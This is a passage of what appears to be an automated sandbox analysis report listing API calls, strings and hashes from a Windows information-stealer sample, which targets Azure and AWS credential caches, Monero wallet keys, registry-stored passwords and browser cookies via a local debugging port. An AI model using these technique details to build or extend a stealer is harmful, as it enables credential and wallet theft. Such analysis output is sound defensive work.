                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,00800FE4), ref: 007F4CD2
                                    • Part of subcall function 007F4B60: lstrcat.KERNEL32(?,?), ref: 007F4CE6
                                    • Part of subcall function 007F4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 007F4CFC
                                    • Part of subcall function 007F4B60: DeleteFileA.KERNEL32(?), ref: 007F4D81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 18e043dbd05bb5761bc91397f021eb5b7dc2fd582ebf6162b1d647f8e91e763d
                                  • Instruction ID: ee61bbf9cefa94a7723889cfe095a7e9ac12be21c255fb35821363e75a58e9ce
                                  • Opcode Fuzzy Hash: 18e043dbd05bb5761bc91397f021eb5b7dc2fd582ebf6162b1d647f8e91e763d
                                  • Instruction Fuzzy Hash: 914198F9940208A7DB54E770EC9BFED73389B64700F404554B299A52C2EDB85BC88B92
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007F91FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: d69fee559ed45f1bb3eb1052c1d94032cc9dfe847005728c316827fdbd4859df
                                  • Instruction ID: 4c2ea702489f26887d8dc94a4387ce23c3c05708c2a59a003cc9ac557e6a14db
                                  • Opcode Fuzzy Hash: d69fee559ed45f1bb3eb1052c1d94032cc9dfe847005728c316827fdbd4859df
                                  • Instruction Fuzzy Hash: 5A71D071914208EBDB14EFE4DC99FEEB778BF88700F108608F615A72A1DB74A905CB61
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F3415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F35AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F373A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: b54bbfae80b3d435e4f0e172428d6b25676496bb4d0756821adb3684be01e5b1
                                  • Instruction ID: fa50845d9b45337d606ed9a915fbeb4aef6007bbb35189401141957607886894
                                  • Opcode Fuzzy Hash: b54bbfae80b3d435e4f0e172428d6b25676496bb4d0756821adb3684be01e5b1
                                  • Instruction Fuzzy Hash: E812E2F191011CEACB14EB90DDA6FFD7739AF14300F004599E60A66291EF386B49CF65
                                  APIs
                                    • Part of subcall function 007E9A50: InternetOpenA.WININET(00800AF6,00000001,00000000,00000000,00000000), ref: 007E9A6A
                                  • lstrcat.KERNEL32(?,cookies), ref: 007E9CAF
                                  • lstrcat.KERNEL32(?,008012C4), ref: 007E9CC1
                                  • lstrcat.KERNEL32(?,?), ref: 007E9CD5
                                  • lstrcat.KERNEL32(?,008012C8), ref: 007E9CE7
                                  • lstrcat.KERNEL32(?,?), ref: 007E9CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 007E9D0D
                                  • lstrlen.KERNEL32(00000000), ref: 007E9D17
                                  • lstrlen.KERNEL32(00000000), ref: 007E9D26
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 3174675846-3542011879
                                  • Opcode ID: 27d24fa49168042cdff4d5a95f51c2fb88612e8cc411f7031a54b12431ca3d30
                                  • Instruction ID: 3b1d69ab1ffafcbb28bad00e61a918ac24a190be8fc33a4252532b960a82a6bf
                                  • Opcode Fuzzy Hash: 27d24fa49168042cdff4d5a95f51c2fb88612e8cc411f7031a54b12431ca3d30
                                  • Instruction Fuzzy Hash: 72515FB2910508EBCB14EBE0DC99FEE7738AF48301F404658F219A7191EF785A49CF61
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E62D0: InternetOpenA.WININET(00800DFF,00000001,00000000,00000000,00000000), ref: 007E6331
                                    • Part of subcall function 007E62D0: StrCmpCA.SHLWAPI(?,0145E350), ref: 007E6353
                                    • Part of subcall function 007E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E6385
                                    • Part of subcall function 007E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E63D5
                                    • Part of subcall function 007E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E640F
                                    • Part of subcall function 007E62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6421
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F5568
                                  • lstrlen.KERNEL32(00000000), ref: 007F557F
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 007F55B4
                                  • lstrlen.KERNEL32(00000000), ref: 007F55D3
                                  • lstrlen.KERNEL32(00000000), ref: 007F55FE
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 56e05bcbc2a839414710c9ab5f183e7151f61a9963f438749f818735623a89d4
                                  • Instruction ID: 18686c98e5b4b57b47d669f556995997928f41e2dc64d0bf9c132c091bf34b22
                                  • Opcode Fuzzy Hash: 56e05bcbc2a839414710c9ab5f183e7151f61a9963f438749f818735623a89d4
                                  • Instruction Fuzzy Hash: 4A510CB061014CEBCB18FF64CDAAAFD777AAF50350F504458F60A57692EB386B05CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: d93b1c1d0eabe8eaaf3dea6730c950c596440176a7306ca9a543b1e90b36d6d6
                                  • Instruction ID: b25bce058c9ce227921797ee578ca0131e1ea4322c2ead0bf134c286618eeaaf
                                  • Opcode Fuzzy Hash: d93b1c1d0eabe8eaaf3dea6730c950c596440176a7306ca9a543b1e90b36d6d6
                                  • Instruction Fuzzy Hash: 00C182B590010DEBCB14EF60DC99FEE73B9AF54304F004599F609A7292EA74AA85CF91
                                  APIs
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F453C
                                  • lstrcat.KERNEL32(?,0145DD10), ref: 007F455B
                                  • lstrcat.KERNEL32(?,?), ref: 007F456F
                                  • lstrcat.KERNEL32(?,0145CDF0), ref: 007F4583
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007F8F20: GetFileAttributesA.KERNEL32(00000000,?,007E1B94,?,?,0080577C,?,?,00800E22), ref: 007F8F2F
                                    • Part of subcall function 007EA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007EA489
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                    • Part of subcall function 007F9550: GlobalAlloc.KERNEL32(00000000,007F462D,007F462D), ref: 007F9563
                                  • StrStrA.SHLWAPI(?,0145DBD8), ref: 007F4643
                                  • GlobalFree.KERNEL32(?), ref: 007F4762
                                    • Part of subcall function 007EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA23F
                                    • Part of subcall function 007EA210: LocalAlloc.KERNEL32(00000040,?,?,?,007E4F3E,00000000,?), ref: 007EA251
                                    • Part of subcall function 007EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA27A
                                    • Part of subcall function 007EA210: LocalFree.KERNEL32(?,?,?,?,007E4F3E,00000000,?), ref: 007EA28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F46F3
                                  • StrCmpCA.SHLWAPI(?,008008D2), ref: 007F4710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007F4722
                                  • lstrcat.KERNEL32(00000000,?), ref: 007F4735
                                  • lstrcat.KERNEL32(00000000,00800FA0), ref: 007F4744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
• Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 16210858246b6f4f1bc9dd16a674e9b11835bfccdab7c8918c260905312c7c75
                                  • Instruction ID: 06e2789a4f6b42b6f153eadefc079de73282de881016a72b39b55e3d6206a0b0
                                  • Opcode Fuzzy Hash: 16210858246b6f4f1bc9dd16a674e9b11835bfccdab7c8918c260905312c7c75
                                  • Instruction Fuzzy Hash: DD7147B6900208BBDF14EBF4DD59FEE7379AB88300F008598F605A6191DA78DB59CF51
                                  APIs
                                    • Part of subcall function 007E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E12B4
                                    • Part of subcall function 007E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 007E12BB
                                    • Part of subcall function 007E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E12D7
                                    • Part of subcall function 007E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E12F5
                                    • Part of subcall function 007E12A0: RegCloseKey.ADVAPI32(?), ref: 007E12FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 007E134F
                                  • lstrlen.KERNEL32(?), ref: 007E135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 007E1377
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 007E1465
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 007E14EF
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: bde19de887107a7ad178eae8f550697ebe57dee5954bbb6c8cfa9193a10bc92c
                                  • Instruction ID: 98e9be42e9fe5706235eb6c25d0c073976bc6da3a09097543538bc588f9ecf17
                                  • Opcode Fuzzy Hash: bde19de887107a7ad178eae8f550697ebe57dee5954bbb6c8cfa9193a10bc92c
                                  • Instruction Fuzzy Hash: 215141F195011CABCB15EB60DD96EFD733DAB54300F4045D8B30E62192EE786B89CA66
                                  APIs
                                  • InternetOpenA.WININET(00800AF6,00000001,00000000,00000000,00000000), ref: 007E9A6A
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007E9AAB
                                  • InternetCloseHandle.WININET(00000000), ref: 007E9AC7
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 3289985339-2144369209
                                  • Opcode ID: 232dd5c3075f7409f361ac0b83502b8dc91d14737af829550ee85a6ae18310fb
                                  • Instruction ID: 92d8fb7eb2f2c009124863037fc583ca4b57cec6b5f860bbf3f9b1c0b729eef3
                                  • Opcode Fuzzy Hash: 232dd5c3075f7409f361ac0b83502b8dc91d14737af829550ee85a6ae18310fb
                                  • Instruction Fuzzy Hash: 94412075A11258EBCB14DF94DC99FED7774FB48740F104194F609AA291CBB8AE80CF60
                                  APIs
                                    • Part of subcall function 007E7330: memset.MSVCRT ref: 007E7374
                                    • Part of subcall function 007E7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E739A
                                    • Part of subcall function 007E7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7411
                                    • Part of subcall function 007E7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 007E746D
                                    • Part of subcall function 007E7330: GetProcessHeap.KERNEL32(00000000,?), ref: 007E74B2
                                    • Part of subcall function 007E7330: HeapFree.KERNEL32(00000000), ref: 007E74B9
                                  • lstrcat.KERNEL32(00000000,0080192C), ref: 007E7666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007E76A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 007E76BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007E76EF
                                  • lstrcat.KERNEL32(00000000,00801934), ref: 007E7700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007E7733
                                  • lstrcat.KERNEL32(00000000,00801938), ref: 007E774D
                                  • task.LIBCPMTD ref: 007E775B
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 209d40a2874c1dbf688f97abe9b862aea1d3ec378edff9054c4649df886174b5
                                  • Instruction ID: ee6444f2d41c01736b8427442a23dca63a31c9bd0bc1b403a7f90f37da1973b8
                                  • Opcode Fuzzy Hash: 209d40a2874c1dbf688f97abe9b862aea1d3ec378edff9054c4649df886174b5
                                  • Instruction Fuzzy Hash: 493165B1909108DBDF09EBE0DC99DFE7779AB88301B504218F116B72A2DA78AD46CB51
                                  APIs
                                  • memset.MSVCRT ref: 007E7374
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 007E746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007E74B2
                                  • HeapFree.KERNEL32(00000000), ref: 007E74B9
                                  • task.LIBCPMTD ref: 007E75B5
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: Password
                                  • API String ID: 2808661185-3434357891
                                  • Opcode ID: dff33f3ae8903ef17bb409b3740c6d15a7788c4f47000cd75accf46bfbb95c88
                                  • Instruction ID: a3da531fe8766a5b6108b82a2bd7771535629f2ed546e713f0a8523021a1e771
